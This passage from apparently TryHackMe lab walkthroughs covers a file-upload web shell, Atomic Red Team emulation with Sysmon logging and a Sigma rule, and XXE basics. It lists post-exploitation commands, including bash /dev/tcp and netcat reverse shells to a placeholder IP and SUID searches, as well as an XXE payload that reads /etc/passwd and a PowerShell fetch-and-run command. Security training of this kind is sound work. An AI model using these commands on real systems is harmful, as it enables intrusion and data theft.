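        return False, "content does not match declared image type"
    # Defence in depth: a real image never carries a PHP open tag.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Server-chosen random name: the client never controls what path is written."""
    return secrets.token_hex(16) + ext


def store_profile_image(client_filename: str, data: bytes) -> Tuple[bool, str]:
    """Validate, then return the path the file would be written to (no disk I/O here)."""
    accepted, reason = validate_profile_image(client_filename, data)
    if not accepted:
        return False, reason
    ext = os.path.splitext(client_filename)[1].lower()
    return True, os.path.join(UPLOAD_DIR, stored_name(ext))


# Constructed input: a minimal PNG header padded with zero bytes.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64

if __name__ == "__main__":
    print(validate_profile_image("avatar.png", SAMPLE_PNG))
    print(validate_profile_image("shell.php", b"<?php echo 'not an image'; ?>"))
```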
So, to exploit it, we navigate to the profile picture page:

Instead of a new profile picture, we can upload our malicious PHP script and update our profile:

In the case of this application, the RCE is possible through unrestricted file upload. Once this "profile picture" is uploaded and updated, it is stored in the /admin/assets/img/profile/ directory. The file can then be accessed directly via http://<ip-address-or-localhost>/<projectname>/admin/assets/img/profile/shell.php. When this is accessed, we can then see the malicious code in action:

Now, we can run commands directly against the operating system using this bar, and the output will be displayed. For example, running the command pwd now returns the following:

MAKING THE MOST OF IT

Once the vulnerability has been exploited and you have access to the operating system via a web shell, there are many next steps you could take, depending on a) what your goal is and b) what misconfigurations are present on the system, which will determine exactly what you can do.
Here are some examples of commands you could run once you have gained access, and why you might run them (if the system is running on a Linux OS like our example target system):

ls
    Will give you an idea of what files/directories surround you
cat
    A command used to output the contents of documents such as text files
pwd
    Will give you an idea of where in the system you are
whoami
    Will let you know who you are in the system
hostname
    The system name and potentially its role in the network
uname -a
    Will give you some system information like the OS, kernel version, and more
id
    Whether the current user is assigned to any groups
ifconfig
    Allows you to understand the system's network setup
bash -i >& /dev/tcp/<your-ip>/<port> 0>&1
    A command used to begin a reverse shell via bash
nc -e /bin/sh <your-ip> <port>
    A command used to begin a reverse shell via Netcat
find / -perm -4000 -type f 2>/dev/null
    Finds SUID (Set User ID) files, useful in privilege escalation attempts as they can sometimes be leveraged to execute a binary with the privileges of its owner (which is often root)
find / -writable -type f 2>/dev/null | grep -v "/proc/"
    Also helpful in privilege escalation attempts; used to find files with writable permissions

These are just some commands that can be run following a successful RCE exploit. It's very open-ended, and what you can do will rely on your ability to inspect an environment and on the vulnerabilities in the system itself.

PRACTICAL

Your task today is two-fold. First, you must access Kibana on MACHINE_IP:5601 to investigate the attack and answer the blue questions below. Then, you will proceed to Frosty Pines Resort's website at http://frostypines.thm and recreate the attack to answer the red questions and inform the developers what element of the website was vulnerable. Please note, to access http://frostypines.thm, you will need to reference it within your hosts file.
On the AttackBox, this can be done by executing the following command in a terminal:

echo "MACHINE_IP frostypines.thm" >> /etc/hosts

If you do not see an IP address (i.e. 10.10.x.x) and only MACHINE_IP, ensure that you have started the target machine by pressing the green "Start Machine" button further up the task, under the heading "Connecting to the Machine".

To review the logs of the attack on Frosty Pines Resorts, make sure you select the "frostypines-resorts" collection within ELK, such as below:

The date and time that you will need to use when reviewing the logs will be between 11:30 and 12:00 on October 3rd 2024.

Answer the questions below

* BLUE: Where was the web shell uploaded to? Answer format: /directory/directory/directory/filename.php
* BLUE: What IP address accessed the web shell?
* RED: What are the contents of flag.txt?
* If you liked today's task, you can learn how to harness the power of advanced ELK queries.

Task 10 Atomic Red Team
Day 4: I’m all atomic inside!

Task includes a deployable machine

The Story

SOC-mas is approaching! And the town of Wareville has started preparations for the grand event. Glitch, a quiet, talented security SOC-mas engineer, had a hunch that this year's celebrations would be different. With looming threats, he decided to revamp the town's security defences. Glitch began to fortify the town's security defences quietly and meticulously. He started by implementing a protective firewall, patching vulnerabilities, and accessing endpoints to patch security vulnerabilities. As he worked tirelessly, he left "breadcrumbs", small traces of his activity.
Unaware of Glitch's good intentions, the SOC team spotted anomalies: logs showing admin access, escalation of privileges, patched systems behaving differently, and security tools triggering alerts. The SOC team misinterpreted the system modifications as a sign of an insider threat or rogue attacker and decided to launch an investigation using the Atomic Red Team framework.

LEARNING OBJECTIVES

* Learn how to identify malicious techniques using the MITRE ATT&CK framework.
* Learn how to use Atomic Red Team tests to conduct attack simulations.
* Understand how to create alerting and detection rules from the attack tests.

CONNECTING TO THE MACHINE

Before moving forward, review the questions in the connection card below:

Click on the green Start Machine button below to start the virtual machine and wait 1-2 minutes for the system to boot completely in a split-screen view. If the virtual machine isn't visible, use the blue Show Split View button at the top of the page. Additionally, if you wish to connect to the machine via RDP, use the credentials below:

Username | Administrator
Password | Emulation101!
IP | MACHINE_IP

The VM has Atomic Red Team and Sysmon installed. This will allow us to emulate an attack using TTPs described in the MITRE ATT&CK framework.

DETECTION GAPS

While it might be the utopian dream of every blue teamer, we will rarely be able to detect every attack or every step in an attack kill chain. This is a reality that all blue teamers face: there are gaps in their detection. But worry not! These gaps do not have to be the size of black holes; there are things we can do to help make these gaps smaller. Detection gaps usually exist for one of two main reasons:

* Security is a cat-and-mouse game. As we detect more, the threat actors and red teamers will find new sneaky ways to thwart our detection. We then need to study these novel techniques and update our signature and alert rules to detect these new techniques.
* The line between anomalous and expected behaviour is often very fine and sometimes even has significant overlap. For example, let's say we are a company based in the US. We expect to see almost all of our logins come from IP addresses in the US. One day, we get a login event from an IP in the EU, which would be an anomaly. However, it could also be our CEO travelling for business. This is an example where normal and malicious behaviour intertwine, making it hard to create accurate detection rules that would not produce too much noise.

Blue teams constantly refine and improve their detection rules to close the gaps they experience due to the two reasons mentioned above. Let's take a look at how this can be done!

CYBER ATTACKS AND THE KILL CHAIN

Before diving into creating new detection rules, we first have to discuss some key topics. The first topic to discuss is the Cyber Kill Chain. All cyber attacks follow a fairly standard process, which is explained quite well by the Unified Cyber Kill Chain:

As a blue teamer, it would be our dream to prevent all attacks at the start of the kill chain, so that even as threat actors start their reconnaissance, we already stop them dead in their tracks. But, as discussed before, this is not possible. The goal then shifts slightly. If we are unable to fully detect and prevent a threat actor at any one phase in the kill chain, the goal becomes to perform detections across the entire kill chain in such a way that even if there are detection gaps in a single phase, the gap is covered in a later phase. The goal is, therefore, to ensure we can detect the threat actor before the very last phase of goal execution.

MITRE ATT&CK

A popular framework for understanding the different techniques and tactics that threat actors perform throughout the kill chain is the MITRE ATT&CK framework. The framework is a collection of tactics, techniques, and procedures that have been seen to be used by real threat actors.
The framework provides a navigator tool where these TTPs can be investigated:

However, the framework primarily discusses these TTPs in a theoretical manner. Even if we know we have a gap for a specific TTP, we don't really know how to test the gap or close it down. This is where the Atomics come in!

ATOMIC RED

The Atomic Red Team library is a collection of red team test cases that are mapped to the MITRE ATT&CK framework. The library consists of simple test cases that can be executed by any blue team to test for detection gaps and help close them down. The library also supports automation, where the techniques can be executed automatically. However, it is also possible to execute them manually.

DROPPING THE ATOMIC

McSkidy has a vague idea of what happened to the "compromised machine". It seems someone tried to use Atomic Red Team to emulate an attack on one of our systems without permission. The perpetrator also did not clean up the test artefacts. Let's have a look at what happened.

RUNNING AN ATOMIC

McSkidy suspects that the supposed attacker used the MITRE ATT&CK technique T1566.001 Spearphishing with an attachment. Let's recreate the attack emulation performed by the supposed attacker and then look for the artefacts created. Open up a PowerShell prompt as administrator and follow along with us. Let's start by having a quick peek at the help page. Enter the command Get-Help Invoke-Atomictest.
You should see the output below:

Administrator: Windows PowerShell
PS C:\Users\Administrator> Get-Help Invoke-Atomictest

NAME
    Invoke-AtomicTest

SYNTAX
    Invoke-AtomicTest [-AtomicTechnique] <string[]> [-ShowDetails] [-ShowDetailsBrief] [-TestNumbers <string[]>] [-TestNames <string[]>] [-TestGuids <string[]>] [-PathToAtomicsFolder <string>] [-CheckPrereqs] [-PromptForInputArgs] [-GetPrereqs] [-Cleanup] [-NoExecutionLog] [-ExecutionLogPath <string>] [-Force] [-InputArgs <hashtable>] [-TimeoutSeconds <int>] [-Session <PSSession[]>] [-Interactive] [-KeepStdOutStdErrFiles] [-LoggingModule <string>] [-WhatIf] [-Confirm] [<CommonParameters>]

ALIASES
    None

REMARKS
    None

The help above only shows what parameters are available, without any explanation. Even though most parameter names are self-explanatory, let us have a quick overview of the parameters we will use in this walkthrough:

Parameter | Explanation | Example use
-AtomicTechnique | This defines what technique you want to emulate. You can use the complete technique name or the "TXXXX" value. This flag can be omitted. | Invoke-AtomicTest -AtomicTechnique T1566.001
-ShowDetails | Shows the details of each test included in the Atomic. | Invoke-AtomicTest T1566.001 -ShowDetails
-ShowDetailsBrief | Shows the title of each test included in the Atomic. | Invoke-AtomicTest T1566.001 -ShowDetailsBrief
-CheckPrereqs | Checks whether all necessary components are present for testing. | Invoke-AtomicTest T1566.001 -CheckPrereqs
-TestNames | Sets the tests you want to execute using the complete Atomic Test Name. | Invoke-AtomicTest T1566.001 -TestNames "Download Macro-Enabled Phishing Attachment"
-TestGuids | Sets the tests you want to execute using the unique test identifier. | Invoke-AtomicTest T1566.001 -TestGuids 114ccff9-ae6d-4547-9ead-4cd69f687306
-TestNumbers | Sets the tests you want to execute using the test number. The scope is limited to the Atomic Technique. | Invoke-AtomicTest T1566.001 -TestNumbers 2,3
-Cleanup | Runs the cleanup commands that were configured to revert your machine state to normal. | Invoke-AtomicTest T1566.001 -TestNumbers 2 -Cleanup

Our First Command

We can build our first command now that we know which parameters are available. We would like to know more about what exactly happens when we test technique T1566.001. To get this information, we must include the name of the technique we want information about and then add the flag -ShowDetails to our command. Let's have a look at the command we constructed: Invoke-AtomicTest T1566.001 -ShowDetails. This command displays the details of all tests included in the T1566.001 Atomic.

Atomic Test T1566.001 Details
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -ShowDetails
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics

[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Download Macro-Enabled Phishing Attachment
Atomic Test Number: 1
Atomic Test GUID: 114ccff9-ae6d-4547-9ead-4cd69f687306
Description: This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file. The file "PhishingAttachment.xlsm" is downloaded to the %temp% directory.

Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm

Cleanup Commands:
Command:
Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore
[!!!!!!!!END TEST!!!!!!!]
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Word spawned a command shell and used an IP address in the command line
Atomic Test Number: 2
Atomic Test GUID: cbb6799a-425c-4f83-9194-5447a909d67f
Description: Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8

Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"

Command (with inputs):
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"C:\Users\Public\art.jse`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"

Cleanup Commands:
Command:
Remove-Item #{jse_path} -ErrorAction Ignore

Command (with inputs):
Remove-Item C:\Users\Public\art.jse -ErrorAction Ignore

Dependencies:
Description: Microsoft Word must be installed
Check Prereq Command:
try { New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0 } catch { exit 1 }
Check Prereq Command (with inputs):
try { New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0 } catch { exit 1 }
Get Prereq Command:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
Get Prereq Command (with inputs):
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
[!!!!!!!!END TEST!!!!!!!]

The output above is clearly split up into multiple parts, each matching a test. Let's examine what type of information is provided in a test. We will use the test we want to run as an example.

Key | Value | Description
Technique | Phishing: Spearphishing Attachment T1566.001 | The full name of the MITRE ATT&CK technique that will be tested
Atomic Test Name | Download Macro-Enabled Phishing Attachment | A descriptive name of the type of test that will be executed
Atomic Test Number | 1 | A number assigned to the test; we can use this in the command to specify which test we want to run.
Atomic Test GUID | 114ccff9-ae6d-4547-9ead-4cd69f687306 | A unique ID assigned to this test; we can use this in the command to specify which test we want to run.
Description | This atomic test downloads a macro-enabled document from the Atomic Red Team GitHub repository, simulating an end-user clicking a phishing link to download the file. The file "PhishingAttachment.xlsm" is downloaded to the %temp% directory. | Provides a detailed explanation of what the test will do.
Attack commands | Executor: powershell; ElevationRequired: False; Command: $url = 'http://localhost/PhishingAttachment.xlsm'; Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm | This provides an overview of all the commands run during the test, including the executor of those commands and the required privileges. It also helps us determine where to look for artefacts in Windows Event Viewer.
Cleanup commands | Command: Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore | An overview of the commands executed to revert the machine back to its original state.
Dependencies | There are no dependencies required. | An overview of all required resources that must be present on the testing machine in order to execute the test

Phishing: Spearphishing Attachment T1566.001 Emulated

Let's continue and run the first test of T1566.001. Before running the emulation, we should ensure that all required resources are in place to conduct it successfully. To verify this, we can add the flag -CheckPrereq to our command. The command should look something like this: Invoke-AtomicTest T1566.001 -TestNumbers 1 -CheckPrereq. This command will use the data included in the "dependencies" part of the test details to verify whether all required resources are present. Looking at the test 1 dependencies of the T1566.001 Atomic, no additional resources are required. Run the same command for test 2, and it will state that Microsoft Word needs to be installed, as shown below:

Administrator: Windows PowerShell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 2 -CheckPrereq
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics

CheckPrereq's for: T1566.001-2 Word spawned a command shell and used an IP address in the command line
Prerequisites not met: T1566.001-2 Word spawned a command shell and used an IP address in the command line
[*] Microsoft Word must be installed

Try installing prereq's with the -GetPrereqs switch

Now that we have verified the dependencies, let us continue with the emulation. Execute the following command to start the emulation: Invoke-AtomicTest T1566.001 -TestNumbers 1, and you should get the following output:

Executing Atomic Test T1566.001
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics

Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment

Based on the output, we can determine that the test was successfully executed.
We can now analyse the logs in the Windows Event Viewer to find Indicators of Attack and Compromise.

DETECTING THE ATOMIC

Now that we have executed the T1566.001 Atomic, we can look for log entries that point us to this emulated attack. For this purpose, we will use the Windows Event Logs. This machine comes with Sysmon installed. System Monitor (Sysmon) provides us with detailed information about process creation, network connections, and changes to file creation time. To make it easier for us to pick up the events created for this emulation, we will first clean up the files from the previous test by running the command Invoke-AtomicTest T1566.001 -TestNumbers 1 -cleanup.

Administrator: Windows PowerShell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1 -cleanup

Now, we will clear the Sysmon event log:

* Open up Event Viewer by clicking the icon in the taskbar, or by searching for it in the Start Menu.
* Navigate to Applications and Services => Microsoft => Windows => Sysmon => Operational on the left-hand side of the screen.
* Right-click Operational on the left-hand side of the screen and click Clear Log. Click Clear when the popup shows.

Now that we have cleaned up the files and the Sysmon logs, let us run the emulation again by issuing the command Invoke-AtomicTest T1566.001 -TestNumbers 1.

Administrator: Windows PowerShell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics

Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment

Next, go to the Event Viewer, right-click on the Operational log on the left-hand side of the screen and then click on Refresh. There should be new events related to the emulated attack. Now sort the table on the Date and Time column to order the events chronologically (oldest first).
The first two events of the list are tests that Atomic executes for every emulation. We are interested in the two events that detail the attack:

* First, a process was created for PowerShell to execute the following command: "powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}
* Then, a file was created with the name PhishingAttachment.xlsm.

Click on each event to see the details. When you select an event, you should see a detailed overview of all the data collected for that event. Click on the Details tab to show all the EventData in a readable format. Let us take a look at the details of these events below. The data highlighted is valuable for incident response and for creating alerting rules.

Navigate to the directory C:\Users\Administrator\AppData\Local\Temp\ and open the file PhishingAttachment.txt. The flag included is the answer to question 1. Make sure to answer the question now, as the cleanup command will delete this file.

Let's clean up the artefacts from our spearphishing emulation. Enter the command Invoke-AtomicTest T1566.001-1 -cleanup.

Now that we know which artefacts were created during this spearphishing emulation, we can use them to create custom alerting rules. In the next section, we will explore this topic further.

ALERTING ON THE ATOMIC

In the previous section, we found multiple indicators of compromise through the Sysmon event log. We can use this information to create detection rules to include in our EDR, SIEM, IDS, etc. These tools offer functionalities that allow us to import custom detection rules. There are several detection rule formats, including YARA, Sigma, Snort, and more. Let's look at how we can use the artefacts related to T1566.001 to create a custom Sigma rule. Two events contained possible indicators of compromise.
Let's focus on the event that contained the Invoke-WebRequest command line:

"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}

We can use multiple parts of this artefact in our custom Sigma rule:

* Invoke-WebRequest: It is not common for this command to run from a script behind the scenes.
* $url = 'http://localhost/PhishingAttachment.xlsm': Attackers often use a specific malicious domain to host their payloads. Including the malicious URL in the Sigma rule could help us detect that specific URL.
* PhishingAttachment.xlsm: This is the malicious payload downloaded and saved on our system. We can include its name in the Sigma rule as well.

Combining all these pieces of information in a Sigma rule would look something like this:

PowerShell Invoke-WebRequest Sigma Rule
title: Detect PowerShell Invoke-WebRequest and File Creation of PhishingAttachment.xlsm
id: 1
description: Detects the usage of Invoke-WebRequest to download PhishingAttachment.xlsm and the creation of the file PhishingAttachment.xlsm.
status: experimental
author: TryHackMe
logsource:
  category: process_creation
  product: windows
  service: sysmon
detection:
  selection_invoke_webrequest:
    EventID: 1
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'http://localhost/PhishingAttachment.xlsm'
  selection_file_creation:
    EventID: 11 # Sysmon Event ID for File Creation
    TargetFilename|endswith: '\PhishingAttachment.xlsm'
  condition: selection_invoke_webrequest or selection_file_creation
falsepositives:
  - Legitimate administration activity may use Invoke-WebRequest, and legitimate Excel files may be created with similar names.
level: high
tags:
  - attack.t1071.001 # Web Service - Application Layer Protocol
  - attack.t1059.001 # PowerShell
  - attack.t1105 # Ingress Tool Transfer
  - attack.t1566.001 # Spearphishing Attachment

The detection part is where the effective detection happens.
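To make the matching in that detection block concrete, here is a small added example (not TryHackMe's code, and not a real Sigma backend): it applies the two selections and the or condition to constructed Sysmon events shaped like the two artefacts found above. The sample events, field names and helper functions are assumptions made for this illustration.

```python
"""Evaluate the Sigma detection block above against constructed Sysmon events.

Added example (not TryHackMe's code). Only the two modifiers the rule
uses, `contains` and `endswith`, and its `or` condition are implemented.
Real deployments convert the rule with sigma-cli/pySigma for the SIEM;
this is just to make the matching logic tangible.
"""

# The rule's detection block, transcribed into Python. In Sigma, a list of
# values under one field is OR'd: a single matching value is enough.
SIGMA_DETECTION = {
    "selection_invoke_webrequest": {
        "EventID": 1,
        "CommandLine|contains": [
            "Invoke-WebRequest",
            "http://localhost/PhishingAttachment.xlsm",
        ],
    },
    "selection_file_creation": {
        "EventID": 11,  # Sysmon file creation
        "TargetFilename|endswith": "\\PhishingAttachment.xlsm",
    },
}
CONDITION = ("selection_invoke_webrequest", "or", "selection_file_creation")


def _field_matches(event: dict, spec: str, expected) -> bool:
    """Evaluate one `Field|modifier: value(s)` pair against an event."""
    field, _, modifier = spec.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    values = expected if isinstance(expected, list) else [expected]
    if modifier == "":  # plain equality, e.g. EventID: 1
        return any(actual == v for v in values)
    text = str(actual)
    if modifier == "contains":
        return any(v in text for v in values)
    if modifier == "endswith":
        return any(text.endswith(v) for v in values)
    raise ValueError(f"modifier not implemented in this example: {modifier}")


def selection_matches(event: dict, selection: dict) -> bool:
    """Field/value pairs inside one selection are AND'd."""
    return all(_field_matches(event, spec, exp) for spec, exp in selection.items())


def matching_selections(event: dict) -> list:
    """Names of the selections this event satisfies (empty list = no match)."""
    return [name for name, sel in SIGMA_DETECTION.items() if selection_matches(event, sel)]


def rule_fires(event: dict) -> bool:
    """Apply the rule's condition: selection_invoke_webrequest or selection_file_creation."""
    left, op, right = CONDITION
    if op != "or":
        raise ValueError("only 'or' conditions are handled here")
    hits = matching_selections(event)
    return left in hits or right in hits


# Constructed events modelled on the two Event Viewer entries discussed above
# (EventID 1 process creation, EventID 11 file creation) plus a benign one.
EVENTS = [
    {
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": '"powershell.exe" & {$url = \'http://localhost/PhishingAttachment.xlsm\' '
                       'Invoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm}',
    },
    {
        "EventID": 11,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "TargetFilename": r"C:\Users\Administrator\AppData\Local\Temp\PhishingAttachment.xlsm",
    },
    {  # benign: Notepad saving a text file, should not match
        "EventID": 11,
        "Image": r"C:\Windows\System32\notepad.exe",
        "TargetFilename": r"C:\Users\Administrator\Documents\notes.txt",
    },
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["EventID"], rule_fires(ev), matching_selections(ev))
```

Because the values under CommandLine|contains are OR'd, any Invoke-WebRequest command line satisfies the first selection on its own, which is exactly why the rule carries a falsepositives entry.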
We can see clearly the artefacts that we discovered during the emulation test. We can then import this rule into the main tools we use for alerts, such as the EDR, SIEM, XDR, and many more. Now that Glitch has shown us his intentions, let's continue with his work and run an emulation for ransomware.

CHALLENGE

As Glitch continues to prepare for SOC-mas and fortifies Wareville's security, he decides to conduct an attack simulation that would mimic a ransomware attack across the environment. He is unsure of the correct detection metrics to implement for this test and asks you for help. Your task is to identify the correct atomic test to run that will take advantage of a command and scripting interpreter, conduct the test, and extract valuable artefacts that would be used to craft a detection rule.

Answer the questions below

* What was the flag found in the .txt file that is found in the same directory as the PhishingAttachment.xlsm artefact?
* What ATT&CK technique ID would be our point of interest?
* What ATT&CK subtechnique ID focuses on the Windows Command Shell?
* What is the name of the Atomic Test to be simulated?
* What is the name of the file used in the test?
* What is the flag found from this Atomic Test?
* Learn more about the Atomic Red Team via the linked room.

Task 11 XXE
Day 5: SOC-mas XX-what-ee?

The Story

The days in Wareville flew by, and Software's projects were nearly complete, just in time for Christmas. One evening, after wrapping up work, Software was strolling through the town when he came across a young boy looking dejected. Curious, Software asked, "What would you like for Christmas?" The boy replied with a sigh, "I wish for a teddy bear, but I know that my family can't afford one."
This brief conversation sparked an idea in Software's mind—what if there was a platform where everyone in town could share their Christmas wishes, and the Mayor's office could help make them come true? Excited by the potential, Software introduced the idea to Mayor Malware, who embraced it immediately. The Mayor encouraged the team to build the platform for the people of Wareville. Through the developers' dedication and effort, the platform was soon ready and became an instant hit. The townspeople loved it!

However, in their rush to meet the holiday deadline, the team had overlooked something critical—thorough security testing. Even Mayor Malware had chipped in to help develop a feature in the final hours. Now, it's up to you to ensure the application is secure and free of vulnerabilities. Can you guarantee the platform runs safely for the people of Wareville?

Learning Objectives

* Understand the basic concepts related to XML
* Explore XML External Entity (XXE) and its components
* Learn how to exploit the vulnerability
* Understand remediation measures

Important Concepts

Extensible Markup Language (XML)

XML is a commonly used method to transport and store data in a structured format that humans and machines can easily understand. Consider a scenario where two computers need to communicate and share data. Both devices need to agree on a common format for exchanging information. This agreement (format) is known as XML. You can think of XML as a digital filing cabinet. Just as a filing cabinet has folders with labelled documents inside, XML uses tags to label and organise information. These tags are like folders that define the type of data stored.
This is what an XML document looks like, a simple piece of text information organised in a structured manner:

<people>
  <name>Glitch</name>
  <address>Wareville</address>
  <email>glitch@wareville.com</email>
  <phone>111000</phone>
</people>

In this case, the tags <people>, <name>, <address>, etc. are like folders in a filing cabinet, but now they store data about Glitch. The content inside the tags, like "Glitch," "Wareville," and "123-4567", represents the actual data being stored. Like before, the key benefit of XML is that it is easily shareable and customisable, allowing you to create your own tags.

Document Type Definition (DTD)

Now that the two computers have agreed to share data in a common format, what about the structure of the format? This is where the DTD comes into play. A DTD is a set of rules that defines the structure of an XML document. Just like a database schema, it acts like a blueprint, telling you what elements (tags) and attributes are allowed in the XML file. Think of it as a guideline that ensures the XML document follows a specific structure. For example, if we want to ensure that an XML document about people will always include a name, address, email, and phone number, we would define those rules through a DTD as shown below:

<!DOCTYPE people [
  <!ELEMENT people (name, address, email, phone)>
  <!ELEMENT name (#PCDATA)>
  <!ELEMENT address (#PCDATA)>
  <!ELEMENT email (#PCDATA)>
  <!ELEMENT phone (#PCDATA)>
]>

In the above DTD, <!ELEMENT> defines the elements (tags) that are allowed, like name, address, email, and phone, whereas #PCDATA stands for parsed character data, meaning the element will consist of just plain text.

Entities

So far, both computers have agreed on the format, the structure of the data, and the type of data they will share. Entities in XML are placeholders that allow the insertion of large chunks of data or the referencing of internal or external files. They assist in making the XML file easy to manage, especially when the same data is repeated multiple times.
Entities can be defined internally within the XML document or externally, referencing data from an outside source. For example, an external entity references data from an external file or resource. In the following code, the entity &ext; could refer to an external file located at "http://tryhackme.com/robots.txt", which would be loaded into the XML, if allowed by the system:

<!DOCTYPE people [
  <!ENTITY ext SYSTEM "http://tryhackme.com/robots.txt">
]>
<people>
  <name>Glitch</name>
  <address>&ext;</address>
  <email>glitch@wareville.com</email>
  <phone>111000</phone>
</people>

We are specifically discussing external entities because they are one of the main ways XXE is introduced when they are not properly managed.

XML External Entity (XXE)

After understanding XML and how entities work, we can now explore the XXE vulnerability. XXE is an attack that takes advantage of how XML parsers handle external entities. When a web application processes an XML file that contains an external entity, the parser attempts to load or execute whatever resource the entity points to. If the necessary sanitisation is not in place, the attacker may point the entity at any malicious source/code, causing undesired behaviour of the web app. For example, if a vulnerable XML parser processes this external entity definition:

<!DOCTYPE people [
  <!ENTITY thmFile SYSTEM "file:///etc/passwd">
]>
<people>
  <name>Glitch</name>
  <address>&thmFile;</address>
  <email>glitch@wareville.com</email>
  <phone>111000</phone>
</people>

Here, the entity &thmFile; refers to the sensitive file /etc/passwd on a system. When the XML is processed, the parser will try to load and display the contents of that file, exposing sensitive information to the attacker. In the upcoming tasks, we will examine how XXE works and how to exploit it.

Connecting to the Machine

Before moving forward, review the questions in the connection card shown below. Click on the green Start Machine button below to start the virtual machine.
While the virtual machine starts, click on the Start AttackBox button at the top of the page and browse to Wareville's WishVille application at http://MACHINE_IP. Please wait 1-2 minutes after the system boots completely to let the auto scripts run successfully.

Practical

Now that you understand the basic concepts related to XML and XXE, we will analyse an application that allows users to view and add products to their carts and perform the checkout activity. You can access the Wareville application hosted at http://MACHINE_IP. This application allows users to request their Christmas wishes.

Flow of the Application

As a penetration tester, it is important to first analyse the flow of the application. First, the user will browse through the products and add items of interest to their wishlist at http://MACHINE_IP/product.php. Click on Add to Wishlist under Wareville's Jolly Cap, as shown below:

After adding products to the wishlist, click the Cart button or visit http://MACHINE_IP/cart.php to see the products added to the cart. On the Cart page, click the Proceed to Checkout button to buy the items as shown below:

On the checkout page, the user will be prompted to enter their name and address as shown below:

Enter any name of your choice and an address, and click on Complete Checkout to place the wish. Once you complete the wish, you will be shown the message "Wish successful. Your wish has been saved as Wish #21", as shown below:

Wish #21 indicates the wishes placed by a user on the website. Once you click on Wish #21, you will see a forbidden page because the details are only accessible to admins. But can we try to bypass this and access other people's wishes? This is what we will try to do in this task.

Intercepting the Request

Before discussing exploiting XXE on the web, let's learn how to intercept the request. First, we need to configure the environment so that, as a pentester, all web traffic from our browser is routed through Burp Suite.
This allows us to see and manipulate the requests as we browse. We will use Burp Suite, a powerful web vulnerability scanner, to intercept and modify requests for this exploitation. You can access Burp Suite in the AttackBox. On the desktop of the AttackBox, you will see a Burp Suite icon as shown below:

Once you click the icon, Burp Suite will open with an introductory screen. You will see a message like "Welcome to Burp Suite". Click on the Next button. On the next screen, you will have the option to Start Burp. Click on the Start Burp button to start the tool. Once Burp Suite has started, you will see its main interface with different tabs, such as Proxy, Intruder, Repeater and others.

Inside Burp Suite, click the Settings tab at the top right. You will see Burp's browser option available under the Tools section. Enable the Allow Burp's browser to run without a sandbox option and click on the close icon in the top right corner of the Settings tab as shown below:

After allowing the browser to run without a sandbox, we can now start the browser with Burp Suite's pre-configured proxy. Navigate to the Open browser option located in the Proxy -> Intercept section of Burp. Open the browser by clicking Open browser as shown below and browse to the URL http://MACHINE_IP, so that all requests are intercepted:

